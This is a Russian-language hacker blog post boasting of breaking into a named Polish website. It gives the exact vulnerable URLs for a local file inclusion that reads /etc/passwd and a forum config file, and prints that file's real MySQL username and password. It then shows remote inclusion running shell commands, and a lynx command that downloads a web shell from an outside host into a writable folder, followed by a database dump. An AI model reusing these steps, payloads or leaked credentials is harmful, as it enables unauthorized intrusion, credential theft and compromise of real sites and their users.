Взлом www.sacriversum.com или девелоперы все таки рулят

моя новая статья

На днях в асю стукнул знакомый с вопросом, что можно сделать с локальной инклудой.
Я помня как в свое время, найдя баг в Search Engine & Directory Powered by Turbo Seek от
FocalMedia.Net (http://security.nnov.ru/docs6776.html) взломал www.uscomputer.net.
Там была возможность чтения произвольных файлов с правами сервера, и найдя пароль в .htpasswd и расшифровав его я получил доступ к сайту. Я объяснил знакомому механизм, но минут через 5 он стукнул вновь и сказал что у него ни чего не выходит. Тогда я попросил у него url, что бы разобраться на месте. Это был польский сайт www.sacriversum.com.
Первым что я увидел был форум phpBB неизвестно какой версии, и я решил его инжектить, но эксплойты не действовали. Снифание админских куков я решил оставить на последок.
Тогда я занялся локальной инклудой. Параметр text скрипта prasa.php позволял читать любые файлы:
http://www.sacriversum.com/prasa.php?text=..../../etc/passwd ,
но ни .htpasswd, ни service.pwd тут не оказалось.
Попробовал я внешнюю инклуду, но вместо результата выполнения команды, я увидел исходный код своего шелла.
Тут же сразу возникла идея вывести содержимое форумного config.php, выполнив запрос http://www.sacriversum.com/prasa.php?text=./forum/config.php и глянув исходный код страницы я получил заветный логин и пассворд для конекта к MySQL:

<?php

//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//

$dbms = 'mysql';

$dbhost = 'localhost';
$dbname = 'sacriversum';
$dbuser = 'mackozer';
$dbpasswd = 'turambar';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);

?>

Попробовал подключиться с этими данными к фтп и был послан, пароль не подходил.
Стал изучать сайт дальше, и нашел чудесный скрипт download.php, который инклудился без проблем:
http://www.sacriversum.com/download.php?pl...u/sh.php&cmd=id
Оставалось только найди папку доступную на запись, и залить веб-шелл. Папка такая нашлась сразу, заботливая рука админа выставила ей разрешение на запись:
drwxrwxrwx 4 mackozer mackozer 512 Apr 17 08:54 revenger/

Оставалось только найти чем закачать свое добро. На серваке кроме lynx не оказалось больше ничего. Пришлось искать мануал по lynx, кстати русскоязычных я практически не нашел. В конце концов я залил полноценный шелл:
http://www.sacriversum.com/download.php?pl...sh.php&cmd=lynx -source http://xxx.narod.ru/fags.php > ./revenger/fags.php
а также сдампил базу форума, может на что сгодится.
Потом поэтапно, разъяснил знакомому как и что делал, а из аськиных логов склепал эту статью.
Не ахти какой взлом, но он еще раз подтвержает истину: "кто ищет, тот найдет".
А девелоперы все таки рулят!

durito